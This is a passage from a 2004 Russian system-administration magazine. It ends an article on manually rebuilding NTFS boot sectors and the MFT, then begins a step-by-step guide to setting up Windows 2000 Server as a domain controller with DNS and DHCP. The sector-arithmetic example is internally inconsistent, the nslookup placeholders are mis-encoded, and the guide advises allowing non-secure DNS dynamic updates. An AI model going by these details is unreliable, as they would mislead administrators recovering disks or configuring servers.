(правда, только на NTFS-разделах). Windows NT 4.0 распо-
лагает ее посередине логического диска, а Windows 2000 –
в последнем секторе раздела. Если partition table цела, про-
сто перейдите в начало следующего раздела и отступите на
сектор назад (Windows 2000) или поделите количество сек-
торов логического диска пополам (с округлением в нижнюю
сторону) и скажите редактору диска «GO» (Windows NT 4.0).
Если же таблица разделов разрушена, найти копию сек-
тора можно глобальным поиском (ищите строку «NTFS» по
смещению 3 от начала сектора). Поскольку положение ко-
пии фиксировано и отсчитывается от начала логического
диска, мы можем с абсолютной уверенностью определить
границы раздела.
Допустим, копия boot найдена в секторе 1 289 724, а
поле NumberSectors содержит значение 12 289 661. Тогда
конечный сектор раздела равен 1 289 724, а стартовый:
1289724 – 12289661 == 63. Поскольку загрузочный сектор
расположен на расстоянии одной головки от partition table,
№10(23), октябрь 2004
образование
что соответствует SectorPerTrack-секторам, мы можем вос-
становить и ее.
В отсутствии копий, boot-сектор приходится реконстру-
ировать вручную. Это легко. В поле идентификатора про-
изводителя заносится строка «NTFS» (без кавычек, но с
четырьмя пробелами на конце). Количество секторов в тре-
ке и число головок заполняются исходя из текущей геомет-
рии диска. Количество скрытых секторов (т.е. секторов, рас-
положенных между началом раздела и boot-сектором) рав-
но числу головок. Общее количество секторов в разделе
вычисляется на основании его размера (если точный раз-
дел не известен, берите значение с запасом).
Количество секторов в кластере определить сложнее
(особенно, если диск отформатирован со значением, отлич-
ным от принятого по умолчанию). Но ситуация вовсе не без-
надежна. Последовательно сканируя файловые записи в
MFT, найдите файл с заранее известной сигнатурой. Пусть
для определенности это будет NTOSKRNL.EXE. Откройте его
аутентичную копию в HEX-редакторе, найдите уникальную
последовательность, гарантировано не встречающуюся ни
в каких других файлах и расположенную в пределах первых
512 байт от его начала, после чего найдите ее глобальным
поиском на диске. Начальный номер кластера вам известен
(он содержится в MFT), логический номер сектора тоже (его
нашел дисковый редактор). Теперь остается лишь соотнес-
ти эти две величины между собой. Естественно, если диско-
вый редактор найдет удаленную копию ntoskrnl.exe (или на
диске будут присутствовать несколько файлов ntoskrnl.exe),
данный метод даст осечку, поэтому полученный результат
необходимо уточнить на других файлах.
Логический номер первого кластера MFT равен перво-
му кластеру, в начале которого встретилась строка «FILE*»
(конечно, при том условии, что MFT не был перемещен).
Штатно Windows выделяет под MFT 10% от емкости разде-
ла, помещая зеркало в середину. Кроме того, ссылка на
зеркало присутствует и в самом MFT. Если же он разру-
шен, переместитесь в середину диска, немного отступите
назад и повторите глобальный поиск строки «FILE*» (толь-
ко смотрите, не вылетите в соседний раздел!). Первое же
найденное вхождение с высокой степенью вероятности и
будет зеркалом.
Количество кластеров на сегмент обычно равно F6h, а
на блоке индексов – 01h. Других значений мне встречать
не доводилось. Серийный номер тома может быть также
любым – он ни на что не влияет.
Для восстановления отсутствующего (искаженного)
bootstrap code загрузите консоль восстановления и отдай-
те команду FIXBOOT.
Заключение
Как видно, в восстановлении данных нет ничего мифическо-
го и для устранения большинства типов разрушений не тре-
буется никакой квалификации. Если же некоторые моменты
вам не понятны, перечитайте эту статью с дисковым редак-
тором в руках. До сих пор мы говорили о достаточно про-
стых и хорошо известных вещах. Теперь, как следует раска-
чавшись и освоившись с основными понятиями, мы можем
отправляться в самые дебри NTFS, восстановлению струк-
тур которой посвящена следующая статья этого цикла.
87
 образование
УСТАНОВКА
И НАСТРОЙКА
W2K SERVER
Данная статья – попытка автора систематизировать свой
опыт по установке и настройке Windows 2000/2003 Server
для начинающих технических специалистов. Она не пре-
тендует на полноту и абсолютную однозначность методов,
а предназначена исключительно для предоставления на-
чального опыта по настройке серверных систем на основе
Windows 2000/2003 Server по принципу пошаговой инструк-
ции. Процесс будет рассмотрен на примере Windows 2000
Server. Отличия в Windows 2003 Server незначительны и,
как правило, интуитивно понятны.
Статья публикуется в двух частях. В первой части рас-
сказывается об установке и настройке Windows 2000 Server
и повышении его роли до контроллера домена. Во второй
части будет рассматрено создание и настройка серверов
приложений на основе служб терминалов Windows и их
модернизации при помощи продукта Citrix Metaframe XP
Presentation Server.
Системные требования
Итак, список того, что нам понадобится, и рекомендации
по системным требованиям:
! Диск с дистрибутивом Windows 2000 Server. Рекомен-
дуется, чтобы он был оригинальным, загрузочным.
! CD-ROM Drive с возможностью загрузиться с него. Не-
которые частично неисправные или старые приводы не
позволяют произвести с них загрузку системы. Если вы
с этим столкнулись, то придется сделать загрузочные
дискеты. Этот процесс описан в самом начале раздела
«Установка ОС Windows 2000 Server»
! Компьютер со следующими минимальными требовани-
ями: PII-433, 128 Мб RAM, 4 Гб HDD. По опыту автора
данные характеристики являются минимальными и не
рекомендованы к реальному использованию. Реальные
системные требования для практической работы зави-
сят от задач, возлагаемых на сервер.
88
РОМАН МАРКОВ
! Если это будет простенький, экономичный сервер для
выполнения задач по хранению нескольких неболь-
ших баз данных (например, базы «1С:Предприятие»)
и предназначенные для использования 2-5 клиента-
ми, то приемлемая конфигурация будет такой: PIII или
Celeron 300-733 МГц, RAM 256 Мб, HDD 10-20 Гб. Этой
же конфигурации хватит для организации шлюза
общего доступа в Интернет для небольшой органи-
зации с количеством рабочих станций до 10 (прокси-
сервер, статистика работы пользователей в сети Ин-
тернет, защитный межсетевой экран – Firewall, по-
чтовый сервер).
! Для организации файл-сервера, используемого ра-
бочей группой от 10 до 20 пользователей или опи-
санного выше шлюза в Интернет для 20-30 пользо-
вателей рекомендуется следующая конфигурация:
PIII-1000-1300, 256-512 Мб RAM, IDE HDD 40-120 Гб,
SCSI HDD 36 Гб. Использование SCSI-диска и быст-
рых процессоров для шлюза требуется при необхо-
димости вести протокол и постоянную переиндекса-
цию базы данных статистики запросов к прокси-сер-
веру и протокола безопасности. При отсутствии та-
кой необходимости достаточно одного IDE-диска и
процессора Celeron-500-733.
! Для организации сервера терминалов с количеством
активных пользователей от 5 до 10: PIV-1.7 ГГц, RAM
512-768 Мб, IDE HDD 40-120 Гб, SCSI HDD 18-36 Гб.
! Сервер терминалов для 15-30 пользователей уже же-
лательно строить на двухпроцессорных системах. На-
пример, для поднятия сервера терминалов для 20
пользователей, каждый из которых открывает по 2
базы «1С:Предприятие» в терминальном режиме, не-
обходим сервер со следующими характеристиками:
2 * Xeon 1.8-2.4 ГГц, 1.5-2 Гб RAM, SCSI-RAID-5 (3-4
SCSI-HDD + SCSI-RAID-контроллер).

Более подробные рекомендации по выбору сервера вы-
ходят за рамки этой статьи. Единственное, что можно ска-
зать, – при наличии финансовой возможности старайтесь
не экономить и покупать качественное «железо», от извес-
тных производителей. Хороший обзор есть здесь: http://
www.fcenter.ru/articles.shtml?technologies/2513.
Установка ОС Windows 2000 Server
Входим в BIOS и задаем первичную загрузку с CD-ROM.
По возможности все остальные устройства для загрузки зап-
рещаем. То есть у нас должно остаться: First boot device –
CD-ROM. Остальные устройства выставляем (если это воз-
можно) в Disabled. Выходим из BIOS, сохранив изменения.
Загружаемся с CD-ROM Windows 2000 Server. Если на
жесткий диск уже установлена какая-либо ОС, то необхо-
димо будет нажать любую клавишу в момент появления
надписи: «Press Any Key for boot from CD», иначе загрузит-
ся старая установленная система. Некоторые частично не-
исправные или старые приводы не позволяют произвести
с них загрузку системы. Если вы с этим столкнулись, то
придется сделать загрузочные дискеты. Или загружаемся
с любой загрузочной дискеты Windows 98 и запускаем из
папки I386 файл winnt.exe, либо подготавливаем специаль-
ные дистрибутивные диски. Подготавливаем 4 чистые от-
форматированные дискеты, на оригинальном дистрибутив-
ном диске заходим в папку BOOTDISK и запускаем
Makeboot.bat. После создания таких дискет загружаемся с
них. Обращаю внимание, что для обеспечения надежности
и удобства необходим оригинальный загрузочный CD с ди-
стрибутивом или загрузка именно с этих дискет.
Программа установки начнет загружать необходимые
файлы. Если вы устанавливаете систему на SCSI- или SATA-
диск, необходимо сразу при старте загрузки нажать клави-
шу <F6> (сообщение об этом появится в нижней части эк-
рана) и установить драйвера этого устройства (поставля-
ются в комплекте с материнской платой или платой SCSI).
Если вы все сделали правильно, программа установки пред-
ложит вам добавить необходимые драйверы, вставив диск
от производителя. После вывода списка устройств, для ко-
торых будут найдены драйверы, выбираем устройство, ус-
тановленное в нашей системе. В противном случае програм-
ма установки сообщит, что не обнаружила дисков для ус-
тановки. В процессе загрузки файлов экран может стать
черным на время до 5 минут. Не спешите перезагружать
компьютер – терпеливо выждите. Нажмите <ENTER> для
продолжения установки, затем <F8> для принятия условий
лицензионного соглашения (если вы, конечно, его прини-
маете). Программа установки предложит выбрать раздел,
в который будет устанавливаться ОС. Рассмотрим новую
установку на диск, все данные с которого можно удалить.
Если на диске имеются нужные данные, необходимо создать
полную архивную копию на другой жесткий диск. В против-
ном случае вы потеряете свои данные!
Если на жестком диске уже есть разделы (они будут ото-
бражены), то просто удаляем их (все данные будут уничто-
жены!). Нажимаем для этого клавишу <D>, затем <ENTER>
и подтверждаем удаление клавишей <L>. Повторяем со
всеми разделами, до тех пор пока не останется одна «Не-
размеченная область», объемом с диск.
№10(23), октябрь 2004
образование
Если у вас новый жесткий диск или вы уже удалили с
него все разделы, то необходимо создать раздел для уста-
новки. Выбираем требуемый диск, выделяем «Неразмечен-
ную область», нажимаем клавишу <C> для создания ново-
го раздела и вводим его размер. Рекомендуемый размер в
мегабайтах 8000-20000. Если общий объем жесткого дис-
ка составляет не более 10 Гб, то имеет смысл отдать под
систему 5000 Мб, а большие приложения устанавливать в
другой раздел (его мы создадим позже, из оставшегося
места на диске). Оставляем неразмеченную область без
изменений и выбираем для установки созданный раздел,
нажав на нем <ENTER>.
Выбираем «Форматировать раздел в системе NTFS».
Далее система отформатирует раздел и скопирует на него
все необходимые файлы. Ваше участие не понадобится в
течение 10-15 минут. Можете пить чай. Компьютер авто-
матически перезагрузится. После этого вы увидите при-
глашение продолжить установку, нажав клавишу «Далее».
После этого произойдет обнаружение устройств, и появит-
ся предложение выбрать язык и стандарты. Здесь реко-
мендуется «Язык системы и язык пользователя» выбирать
«Русский» (установлен по умолчанию), а раскладку клави-
атуры выставлять по умолчанию в «Английский (США)»
(нижнее меню Настроить → Английский (США) → Исполь-
зовать по умолчанию → Применить → ОК). Затем вводим
имя пользователя и организацию (это просто информаци-
онные данные, а не имя для входа), например: Админист-
ратор – ООО «Рога и копыта». Вводим регистрационный
номер вашего дистрибутива. Выбираем лицензирование
«На сервер» и вводим приобретенное нами количество ли-
цензий (по количеству пользователей + запас). Здесь вво-
дим имя нашего сервера и пароль администратора. Имя
сервера – латинскими буквами и цифрами, без пробелов
(допускается «дефис»). Приступаем к выбору компонентов.
Выбор компонентов установки опишем для наиболее час-
то применимых ситуаций. Если что-то понадобится в про-
цессе работы, всегда можно добавить. Снимаем все галки,
кроме «Служба индексирования» и «Стандартные и слу-
жебные программы». Ставим курсор на «Сетевые службы»
и устанавливаем только одну галку: DHCP.
Если наш сервер будет являться еще и сервером тер-
миналов, то устанавливаем галочки также на «Лицензиро-
вание служб терминалов» и «Службы терминалов», а также
при необходимости организации веб-доступа к серверу при-
ложений – устанавливаем галку «Internet Information Server».
На дальнейший вопрос о режиме сервера терминалов (по-
явится чуть позже) ответим: «Режим сервера приложений»
и (если у нас нет особых старых приложений, которым не-
обходим полный доступ к системным папкам) «Разреше-
ния группы пользователей Windows 2000». Соглашаемся с
предупреждением о том, что уже установленные приложе-
ния могут работать некорректно – как правило, это не
критично. Указываем доступность «Для всего предприятия»
если у вас сложная доменная структура и дочерним доме-
нам необходим доступ к данному серверу. Для одноуровне-
вой доменной структуры – выбор не важен. Путь в пункте
«Установить базу данных сервера» оставляем по умолчанию.
Жмем «Далее» и устанавливаем текущие дату и время.
Проверяем, чтобы часовой пояс соответствовал вашему
89
 образование
(в Петербурге и Москве это «(GMT+03:00) Москва, Санкт-
Петербург, Волгоград». Помните, что некорректно устано-
вив этот параметр, можно впоследствии столкнуться с про-
блемами. Жмем «Далее».
Система установит сетевые компоненты и, если сможет
автоматически обнаружить сетевые адаптеры, – предложит
установить их параметры. Выбираем «Особые параметры»,
нажимаем далее и выбираем «Протокол Интернета (TCP/IP).
Жмем «Свойства» и выставляем «Использовать следую-
щий IP-адрес». Задаем адрес. Если мы уверены, что все
настраиваем «с нуля», то задаем, например 192.168.0.1 для
файл-сервера, или 192.168.0.254 для шлюза в Интернет
(подразумевается, что существующая подсеть имеет диа-
пазон адресов 192.168.0.XXX). Для того чтобы проверить,
не занят ли этот адрес кем-либо, включаем все компьюте-
ры локальной сети, и в командной строке пишем:
ping 192.168.0.1
Если получаем сообщение о превышении интервала
ожидания, то адрес, скорее всего, не занят (если, конечно,
прохождение ICMP-пакетов не запрещено firewall, что яв-
ляется в грамотно настроенной локальной сети спорным
решением). Маску подсети оставляем по умолчанию:
255.255.255.0. Параметр «Шлюз по умолчанию» устанав-
ливаем в соответствии с его внутрисетевым IP-адресом.
Если этот компьютер сам будет являться шлюзом в Интер-
нет/другую сеть, то, скорее всего, в нем установлены две
сетевые карты. Тогда первой карте присваиваем адрес
192.168.0.254, маску 255.255.255.0, оставляем пустым поле
«Шлюз по умолчанию». Адреса DNS-серверов оставляем
пустыми, либо присваиваем им адреса DNS-сервера ло-
кальной сети (если он есть) или DNS-сервера провайдера.
При наличии второй сетевой карты, к которой будет под-
ключен кабель, идущий к интернет-провайдеру, выставля-
ем параметры внешнего соединения. Помните, что кабель
соединения с провайдером можно подключать только для
установки критических обновлений системы и межсетево-
го экрана. В противном случае вы рискуете сразу же под-
вергнуться вирусной атаке. Жмем «ОК» и «Далее». Остав-
ляем компьютер без домена галкой «Нет, этот компьютер
не участвует в сети или сеть не имеет доменов» (при необ-
ходимости введем в домен потом, после установки всех
обновлений и драйверов). Жмем «Далее» и опять отдыха-
ем в течение 5-10 минут до появления сообщения «Завер-
шение установки Windows 2000». Нажимаем «Готово», ком-
пьютер уходит на перезагрузку. Входим в BIOS и меняем в
порядке загрузки CD-ROM на IDE-0 или SCSI или RAID (в
зависимости от варианта вашей установки). Сохраняем из-
менения и продолжаем загрузку.
Входим в систему, выбираем «Я выполню настройку это-
го сервера позже», «Далее». Затем снимаем галку «Откры-
вать это окно при загрузке» и закрываем окно. Затем пра-
вой клавишей нажимаем на Мой компьютер → Свойства →
Дополнительно. В разделе «Параметры быстродействия»
выделяем «Оптимизировать быстродействие» и оставля-
ем «Служб, работающих в фоновом режиме», если это бу-
дет отдельно стоящий файл-сервер, или меняем на «При-
ложений», если на нем будут выполняться задачи в режи-
90
ме рабочего стола или сервера терминалов. Затем: Вирту-
альная память → Общий объем файла подкачки на всех
дисках → Изменить… Задаем фиксированный размер фай-
ла подкачки («Исходный размер» и «Максимальный раз-
мер» – присваиваем одну и ту же величину). Рекомендуе-
мый размер – не более 2-кратного размера оперативной
памяти. Не стоит, однако, делать размер этого файла ме-
нее 500 Мб. Не забываем нажать «Задать», а только затем
«ОК». Еще раз жмем «ОК». Если предлагают перезагру-
зиться – отказываемся.
Вставляем диск с драйверами материнской платы и ус-
танавливаем сначала именно ее драйверы. Для экономич-
ных решений на базе обычных (не серверных) материнских
плат рекомендуется иметь в коллекции так называемый уни-
версальный диск с драйверами для самых популярных чип-
сетов. Он автоматически определяет установленную мате-
ринскую плату и устройства, затем предлагает установить
соответствующие драйвера, т.к. очень часто клиенты по-
нятия не имеют, «где у них диск с драйверами от матери».
Перезагружаем компьютер. Снова делаем автозапуск дис-
ка с драйверами. Устанавливаем все оставшиеся драйве-
ра, отказываясь от перезагрузки после каждого из них. Пе-
резагружаем компьютер только после установки всех ос-
тальных драйверов (видео, аудио, сеть, USB и т. д.).
Правой клавишей нажимаем на Мой компьютер → Уп-
равление → Управление дисками.
Если вы не планируете создавать программные RAID-
массивы средствами самой ОС с участием этих дисков, об-
новлять их до динамических необязательно. Здесь не рас-
сматриваются основы файловых систем – подразумевает-
ся, что читатель сам изучит этот материал.
Правой клавишей по приводу CD – Изменение буквы
диска и пути диска → Изменить → Назначить букву диска →
Выбираем следующую за предполагаемым количеством дис-
ков. Например, если у нас есть неразмеченная область на
системном диске, то оставляем ей букву «D», а CD-приводу
присваиваем букву «E». На предупреждение отвечаем со-
гласием. Затем на «Диск 0» щелкаем правой клавишей по
Нераспределенной области → Создать раздел → Далее →
Основной раздел → Далее… Отдаем под него все оставше-
еся место. Не стоит плодить большое количество логичес-
ких дисков – двух достаточно: один под систему, второй под
архивы/дистрибутивы. Разделять систему и данные по раз-
ным разделам очень рекомендуется, т.к. при сбоях раздела
с данными можно будет загрузить систему и попытаться ис-
править неполадки. Жмем Далее → Назначить букву диска
«D» → Далее → Форматировать данный раздел следующим
образом: «Файловая система» – NTFS, «Размер кластера» –
по умолчанию, «Метка тома» – оставляем пустым. Затем,
если мы уверены в качестве нашего диска и у нас нет лиш-
них 1-2 часов на полное форматирование, например, 100 Гб,
то выставляем галку «Быстрое форматирование». Гал-ку
«Применять сжатие файлов и папок» не стоит выставлять,
если вы не понимаете все последствия этого шага. Скажем
лишь, что сжатие всего раздела средствами NTFS при со-
временных объемах дисков неактуально, так как экономия
места не будет оправдана в связи с замедлением работы с
этим томом. Нажимаем «Далее» → «Готово». Если было
выбрано «Быстрое форматирование», то процесс займет не

более 3-5 минут. Иначе – обладая разделом в 50-100 Гб,
можно смело идти за пивом. Час-два форматирования обес-
печен. Поэтому у клиентов рекомендую ставить систему на
заведомо исправный и проверенный диск и выбирать «Быс-
трое форматирование», чтобы не терять ценное время. Пос-
ле того как на нашем разделе появилась надпись «Испра-
вен», закрываем консоль «Управление компьютером».
Далее создаем на диске D: папку Distrib и в ней – папку
W2Kserver. Затем копируем в нее папку I386 с дистрибу-
тивного CD-ROM Windows 2000 Server. Это необходимо для
дальнейшего добавления компонентов, когда под рукой
может просто не оказаться дистрибутива. Позаботьтесь о
себе и своих коллегах! Затем извлекаем диск с Windows 2000
и убираем. Больше он нам не понадобится. В эту же папку
рекомендуется скопировать и драйвера от установленных
устройств.
Открываем Пуск → Программы → Администрирова-
ние → Просмотр событий. Щелкаем правой клавишей по
первому журналу и выбираем «Свойства». Там увеличива-
ем размер журнала, например до 16 384 Кб, и выставляем
галку «Затирать старые события по необходимости». По-
вторяем со всеми журналами.
Заходим в систему. Правой клавишей по пустому мес-
ту на рабочем столе → Свойства → Настройка → Дополни-
тельно → Адаптер → Список всех режимов. Выбираем не-
обходимое сочетание Разрешения/Глубины цвета/Частоты.
Частоту выставляем не менее 85 Гц, если позволит мони-
тор. Нажимаем «Применить». Если после мигания изобра-
жение осталось на экране и является качественным, согла-
шаемся с сохранением этой частоты. Помните, что LCD-мо-
ниторы работают с частотой 60-75 Гц. Наилучший выбор до-
стигается визуально и по техническому описанию модели.
Устанавливаем необходимые обновления системы:
Service Pack и Hotfixes. Всегда необходимо иметь пакеты
критических обновлений на диске (таких как заплатки от
вирусов MSBlast, он же Blaster, и Lsasser). При наличии до-
ступа в Интернет можно установить обновления автомати-
чески. Сразу после установки необходимого Service Pack
(лучше ставить с диска, чтобы не расходовать трафик и вре-
мя) и перезагрузки заходим на сайт www.windowsupdate.com
Об этом будет рассказано позже.
Устанавливаем последний Service Pack (на момент на-
писания статьи это был SP4), принимаем условия соглаше-
ния, выбираем «Архивировать файлы» (необходимо для
возможной отмены установки SP4). Отдыхаем 5-10 минут.
После окончания установки перезагружаем компьютер. Ди-
стрибутив Service Pack также скидываем в нашу папку с
дистрибутивами. Если вы не хотите, чтобы компьютер без
вашего ведома проверял наличие обновлений на сайте
Microsoft, то необходимо зайти в «Панель управления», выб-
рать Windows Update и снять галку «Выполнять обновле-
ние системы». Иначе – галку оставляем. Помните, что если
вы оплачиваете интернет-трафик, то галка «Скачивать и
устанавливать автоматически» может его неожиданно уве-
личить. Теперь установим дополнительные обновления бе-
зопасности.
Есть два способа установки этих обновлений: автома-
тически через Интернет или скачав и установив их само-
стоятельно.
№10(23), октябрь 2004
образование
! Нахождение, закачка и установка обновлений вручную.
Список необходимых обновлений по степени их важнос-
ти можно найти так: заходим на http://www.microsoft.com/
technet/security/current.aspx и выбираем то, что у нас ус-
тановлено. Например, Windows 2000 Server RUS + SP4.
Затем выбираем степень важности. В принципе обыч-
но достаточно степени «Critical», если у вас очень мед-
ленная скорость закачки. После закачки необходимо
вручную установить все обновления.
! Автоматическая установка обновлений. Итак, открыва-
ем Internet Explorer и набираем адрес: www.windows
update.com Соглашаемся с предложением установить
Windows Update. Жмем «Поиск и просмотр обновлений».
После сообщения о нахождении обновлений выбираем
«Просмотр и установка обновлений». Вам будет пред-
ложено установить найденные обновления. Некоторые
(например, IE 6.0) могут требовать отдельной установ-
ки. Вообще, Internet Explorer 6.0 тоже рекомендуется
иметь на диске, чтобы не качать его из Интернета. Итак,
после нахождения обновлений нажимаем на «Критичес-
кие обновления и пакеты обновлений» и выбираем «Ус-
тановить». Система сама скачает и установит все необ-
ходимые файлы. Если же канал в Интернет медленный,
то лучше устанавливать все с диска (критические об-
новления для W2K Server SP4 на момент написания этой
статьи занимают 21 Мб). Устанавливаем последнюю
версию Internet Explorer, если не установили до этого.
Перезагружаемся.
Все. На этом основная установка Windows завершена.
Дальнейшие действия зависят от того, какую роль будет
выполнять наш сервер: контроллер домена, сервер терми-
налов, файл-сервер домена, шлюз в Интернет или просто
файл-сервер для маленькой рабочей группы.
Контроллер домена
Сделаем из нашего сервера контроллер домена. Для этого
он должен быть включен в сеть и ему присвоен IP-адрес
(например, 192.168.0.1, как описывалось выше). Если для
экономии времени вы создаете сервер для клиента в сво-
ей технической лаборатории, то подключать к нему кабель
своей локальной сети не следует. Однако создать на таком
сервере домен все равно возможно. Для этого зайдем в
редактор реестра (regedit) и создадим следующий пара-
метр: в ветке HKLM\System\CurrentControlSet\Services\
Tcpip\Parameters параметр DisableDHCPMediaSense (тип
REG_DWORD). Его значение нужно установить в «1». Пе-
резагрузим компьютер. Создавать этот ключ необходимо
только если компьютер не подключен к локальной сети (се-
тевой карте другого компьютера). Если наш сервер подклю-
чен к нужной сети, то данный параметр создавать не надо.
Теперь поднимаем роль сервера до контроллера домена.
Это нужно, если нам необходимо присвоить чужому (созда-
ваемому для клиентов) серверу IP-адрес, который уже су-
ществует в сети. Такой сервер нельзя подключать к исполь-
зуемым сетевым коммутаторам, так как это спровоцирует
конфликт IP-адресов в системе.
Входим в систему с учетной записью «Администратор»
(или другой, обладающей полномочиями администратора).
91
 образование
В меню «Пуск» выбираем «Выполнить» и вводим команду
DCPROMO. Запустится мастер. Выбираем Контроллер до-
мена в новом домене → Создать новое доменное дерево →
Создать новый лес доменных деревьев. Затем вводим имя
домена.
Внимание! Имя домена внутри локальных сетей может
быть любым. Крайне рекомендуется присвоить вашему до-
мену расширение *.local, тогда он гарантированно не будет
конфликтовать с другими именами в Интернете. Практи-
чески во всех случаях создания локальных сетей со стан-
дартными задачами рекомендуется присваивать доменно-
му имени расширение «local». Не присваивайте доменам
имена типа firma.ru (или любым другим расширением, име-
ющим прописку в виде зоны Интернета), кроме тех случа-
ев, когда вы на 100% уверены, что это вам понадобится.
Как показывает практика, это может понадобиться в край-
не редких случаях, например, при организации фирмы по
хостингу чужих сайтов. Если вы не собираетесь становить-
ся интернет-провайдером (а я уверен, что не собираетесь,
иначе не читали бы эту статью) – присваивайте своему до-
мену расширение «local». Эта зона специально создана для
локальных сетей. Не обращайте внимания на предложение
мастера создания домена: «Если ваша фирма уже имеет
DNS-имя домена, зарегистрированное в Интернете, то мож-
но ввести его». Использование зарегистрированных в Ин-
тернете имен не рекомендуется. Иначе если ваш сайт, по-
чта и прочее хранятся у провайдера, а не в вашей сети –
придется вручную прописывать в DNS-зону соответствие
их имен и IP-адресов.
Итак: вводим имя, например, firma.local, NETBIOS-имя
домена оставляем, как предложено, – без суффикса «local».
Соглашаемся с предложением мастера разместить базу
данных и журнал на нашем системном диске (он обязатель-
но должен быть отформатирован в системе NTFS, как опи-
сывалось ранее). То же самое с папкой SYSVOL. Жмем «Да-
лее». Получаем сообщение об отсутствующем DNS-серве-
ре и нажимаем «ОК». С предложением «Автоматически ус-
тановить и настроить DNS» соглашаемся. Если в нашей сети
нет домена на основе Windows NT 4 Server, то выбираем
«Разрешения, совместимые только с серверами Windows
2000». Вводим пароль для восстановления Active Directory
на случай аварии. Просматриваем итоговую информацию
и подтверждаем свой выбор для начала создания записей
и служб AD. Создание домена занимает некоторое время
(примерно 5-15 минут). Во время установки может потре-
боваться дистрибутив Windows 2000 Server (для таких слу-
чаев и необходимо копировать его на жесткий диск – вдруг
под рукой не окажется). Указываем мастеру путь в скопи-
рованную папку I386. После завершения создания домена
будет предложено перезагрузить компьютер.
После установки Active Directory у нас добавится не-
сколько новых журналов событий. Увеличиваем их размер
и изменяем настройки, как было описано выше.
Настройка DNS-сервера
После перезагрузки заходим в систему с полномочиями Ад-
министратора домена. Затем Пуск → Программы → Адми-
нистрирование → DNS. Откроется консоль управления DNS-
сервером. Если подменю «Администрирование» в меню
92
«Пуск → Программы» отсутствует, то его можно туда до-
бавить, щелкнув правой клавишей по панели задач Свой-
ства → Дополнительно → Параметры меню «Пуск» → Ста-
вим галку «Отображать меню Администрирование».
Раскрываем ветку нашего сервера. Если мы будем на-
страивать и общий доступ в Интернет, то раскрываем «Зоны
прямого просмотра» и удаляем зону «.» (точка). Зоны «.»
может и не быть, если компьютер во время настройки DNS-
сервера был подключен к Интернету). Если настройку об-
щего доступа в Интернет производить не будем – оставля-
ем как есть. Затем раскрываем «Зоны обратного просмот-
ра». Они пусты. Правой клавишей – «Создать новую зону –
Интегрированная в Active Directory». В качестве «Кода сети
(ID)» задаем подсеть. В нашем случае 192.168.0. Нажима-
ем «Готово». Сворачиваем оснастку DNS. Открываем свой-
ства Сетевого окружения и вводим в свойствах TCP/IP на-
шей сетевой карты в качестве адреса DNS-сервера IP-ад-
рес нашего сервера (192.168.0.1). Нажимаем «ОК» и зак-
рываем свойства сетевого окружения.
Разворачиваем оснастку DNS. Раскрываем зоны пря-
мого просмотра и выделяем зону firma.local. Щелкаем по
ней правой клавишей – Свойства. В окне «Общие» – «Ди-
намическое обновление» изменяем значение с «Только
безопасные обновления» на «Да». То же самое проделы-
ваем с зоной обратного просмотра 192.168.0.x Subnet.
Затем открываем командную строку и вводим:
ipconfig /registerdns
Получаем сообщение о том, что «Начата регистрация
записей ресурсов DNS…». Закрываем командную строку.
Открываем оснастку DNS, выделяем «Зону прямого про-
смотра» firma.local и убеждаемся, что справа появилась
новая запись типа «Узел» с именем и IP-адресом нашего
сервера. Затем переходим на нашу зону обратного просмот-
ра. В ней должна появиться запись типа «Указатель», так-
же соответствующая нашему серверу.
Теперь проверим корректность настройки нашего DNS-
сервера. Помните, что домены Windows 2000/2003 (Active
Directory) полностью основаны на DNS, и некорректная на-
стройка DNS-сервера на этом этапе может вызвать даль-
нейшие ошибки домена, вплоть до его полной неработос-
пособности.
Корректность настройки проверяется из командной
строки:
nslookup <èìÿ_íàøåãî_ñåðâåðà>
nslookup <IP_íàøåãî_ñåðâåðà>
В обоих случаях должен быть одинаковый результат, со-
держащий имя и IP-адрес DNS-сервера, обработавшего зап-
рос, а также имя и IP-адрес запрошенного сервера (у нас
на данном этапе они должны совпадать). Если результат от-
личается от приведенного, и мы видим только один IP-ад-
рес/имя сервера, то наш DNS-сервер настроен некорректно!
Пример корректного результата выполнения проверки:
C:\>nslookup Server
Server: Server.firma.local
Address: 192.168.0.1
Name: Server.firma.local
Address: 192.168.0.1

C:\>nslookup 192.168.0.1
Server: Server.firma.local
Address: 192.168.0.1
Name: Server.firma.local
Address: 192.168.0.1
Все! Основа домена построена и остается только доба-
вить пользователей и компьютеры. Для удобства автома-
тизируем получение клиентами IP-адресов (очень удобно,
так как не придется протоколировать, какие IP-адреса в
нашей сети уже присвоены, а какие свободны).
Обратите внимание, что по умолчанию на клиентах в
свойствах сетевой карты стоят галочки на «Регистрировать
это подключение в DNS». Они должны стоять, только если
вы подняли собственный DNS-сервер внутри домена и на
этом сервере в созданной вами зоне разрешено динами-
ческое обновление. У клиентов при этом в качестве DNS-
сервера должен быть прописан только он (в нашей статье
описана именно такая конфигурация). Во всех остальных слу-
чаях эту галку надо снимать, так как клиент будет пытаться
зарегистрировать себя у провайдера и выше, создавая не-
нужный вам трафик, а провайдеру – ненужные запросы.
Настройка DHCP-сервера
Пуск → Программы → Администрирование → DHCP. В кон-
соли выделяем наш сервер (server.firma.local), который ото-
бражается красной стрелочкой. Щелкаем правой клавишей
мыши по нему – «Создать область». Вводим ее название,
например «firma», и жмем «Далее». Вводим начальный и
конечный диапазон IP-адресов, которые мы хотим выделить
нашим клиентам. Например, начальный адрес –
192.168.0.10 (оставляем 10 запасных адресов под серве-
ра), конечный адрес – 192.168.0.100 (оставляем 155 адре-
сов на случай расширения и создания еще одного сервера
DHCP). Предлагаемую маску меняем на 255.255.255.0. Ос-
тальное оставляем как есть. Нажимаем «Далее». Диапа-
зон исключаемых адресов пропускаем. Срок аренды остав-
ляем 8 дней. Соглашаемся с предложением настроить сей-
час дополнительные параметры этой области. В качестве
IP-адреса маршрутизатора указываем IP-адрес нашего
шлюза в Интернет (тот, что задается вручную в поле «Шлюз
по умолчанию») или оставляем это поле пустым, если вы-
хода в Интернет у нас нет. Затем задаем родительский до-
мен (firma.local) и адрес DNS-сервера (192.168.0.1). Поле
«WINS-Серверы» оставляем пустым (если мы не использу-
ем WINS-сервер для обслуживания клиентов W9x). Отве-
чаем «Да, я хочу активизировать эту область сейчас». Зак-
рываем окно мастера.
В консоли DHCP опять кликаем правой клавишей по на-
шему серверу и выбираем «Авторизовать». Ждем несколько
минут и нажимаем <F5> (обновить). Стрелочка на нашем
сервере должна стать зеленой. Если этого не произошло –
закройте консоль DHCP, затем через несколько минут от-
кройте заново и нажмите <F5>. Стрелка должна поменять
цвет на зеленый. Настройка DHCP-сервера закончена. При-
ступим к настройке клиентов.
Настройка клиентов
